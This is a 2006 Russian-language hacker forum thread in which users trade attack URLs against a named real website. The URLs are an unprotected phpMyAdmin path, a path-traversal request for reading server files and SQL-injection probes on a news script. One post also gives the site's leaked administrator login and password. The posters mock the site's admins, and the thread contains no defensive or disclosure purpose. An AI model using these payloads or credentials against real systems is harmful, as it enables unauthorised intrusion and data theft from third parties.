Из разряда я плакал, или как это называеться? |
24.10.2006, 23:30
|
|
Познающий
Регистрация: 10.10.2006
Сообщений: 65
С нами:
10307292
Репутация:
20
|
|
Из разряда я плакал, или как это называеться?
Вообщем тут такая батва, лазал я по нету и тут набрел на такое, честно впервые с таким сталктваюсь, даже незнаю как это назвать, сообстно тема или помощь начинающим хакерам  ????
_http://www.rock-n-roll.ru/administration_phpmyadmin/
_http://www.rock-n-roll.ru/show.php?file=../../../../../../../../../../../usr/local/apache/htdocs/
_http://www.rock-n-roll.ru/news.php?pages=-9999999999999999999999&news=live
Ну и так далее... |
|
|
24.10.2006, 23:34
|
|
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
С нами:
10944386
Репутация:
931
|
|
INSERT INTO `administrator` VALUES (1, NULL, 'oteccs', 'oteccs', 'lol@lol.ru');
Логин и пароль - oteccs
По правде говоря тоже впервые с этим сталкиваюсь...
|
|
|
|
24.10.2006, 23:36
|
|
Green member
Регистрация: 28.12.2005
Сообщений: 376
С нами:
10719686
Репутация:
1833
|
|
_http://www.rock-n-roll.ru/administration_phpmyadmin/
База данных
_http://www.rock-n-roll.ru/show.php?file=../../../../../../../../../../../usr/local/apache/htdocs/
Просмотр файлов
_http://www.rock-n-roll.ru/news.php?pages=-9999999999999999999999&news=live
Больше похоже на SQL-inj
нолутчше так
http://www.rock-n-roll.ru/news.php?pages=-9999999999999999999999'
Если что-то неправильно написал - извените .
|
|
|
|
24.10.2006, 23:38
|
|
Познающий
Регистрация: 10.10.2006
Сообщений: 65
С нами:
10307292
Репутация:
20
|
|
Это все понятно, но кто там админы?????? Обезьяны??
|
|
|
|
24.10.2006, 23:42
|
|
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
С нами:
10944386
Репутация:
931
|
|
Да это мы поняли )...
Не в этом дело...дело в том, что почему открытый, свободных вход в phpmyadmin?
Вот этому мы тут сидим и удивляемся )
|
|
|
|
24.10.2006, 23:45
|
|
Green member
Регистрация: 28.12.2005
Сообщений: 376
С нами:
10719686
Репутация:
1833
|
|
Сообщение от Koller
почему открытый, свободных вход в phpmyadmin?
Умные админы прописали в файле config логин рут и пароль рутоввский и положили,думали для своих нужд но умный Bs_Ru нашол эту папку и зашол в ихнею Базу дАнных что тут непонятного.
|
|
|
|
24.10.2006, 23:49
|
|
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
С нами:
10944386
Репутация:
931
|
|
Если мне память не изменяет, что при заходе в саму программу phpmyadmin требуется ввод логина и пароля, тут ничего такого нет...заходи кто хочешь получается...
Конечно, можно предположить, что админы создали эту папку с учетом того, что никто не найдет, но ведь это просто-напросто глупо...имхо...
|
|
|
|
25.10.2006, 00:13
|
|
Green member
Регистрация: 28.12.2005
Сообщений: 376
С нами:
10719686
Репутация:
1833
|
|
Сообщение от Koller
Если мне память не изменяет, что при заходе в саму программу phpmyadmin требуется ввод логина и пароля, тут ничего такого нет...заходи кто хочешь получается...
Конечно, можно предположить, что админы создали эту папку с учетом того, что никто не найдет, но ведь это просто-напросто глупо...имхо...
Много есть сайты где админы делают глупости с phpmyadmin
Пора-бы знать Ж)
|
|
|
|
24.10.2006, 23:50
|
|
Познающий
Регистрация: 10.10.2006
Сообщений: 65
С нами:
10307292
Репутация:
20
|
|
Не в этом дело...дело в том, что почему открытый, свободных вход в phpmyadmin?
По первости меня это и удивляло ))))
|
|
|
|
25.10.2006, 02:43
|
|
Познающий
Регистрация: 10.10.2006
Сообщений: 65
С нами:
10307292
Репутация:
20
|
|
Да уж но стока дырявых скриптов я не видел негде, это нонсенсн, как будто спецом это делали я в шоке, потому скока народа сайт просмотрели ему гг ))))
|
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Firewall: принцип работы
|
D=P=CH= MOD= |
Защита ОС: вирусы, антивирусы, файрволы. |
0 |
02.10.2006 22:36 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для _-[A.M.D]HiM@S-_](/avatars/avatar21104.jpg?211384){kind=avatar}
![Аватар для _-[A.M.D]HiM@S-_](/avatars/avatar21104.jpg?211394){kind=avatar}
![Аватар для _-[A.M.D]HiM@S-_](/avatars/avatar21104.jpg?211406){kind=avatar}
Комбинированный вид
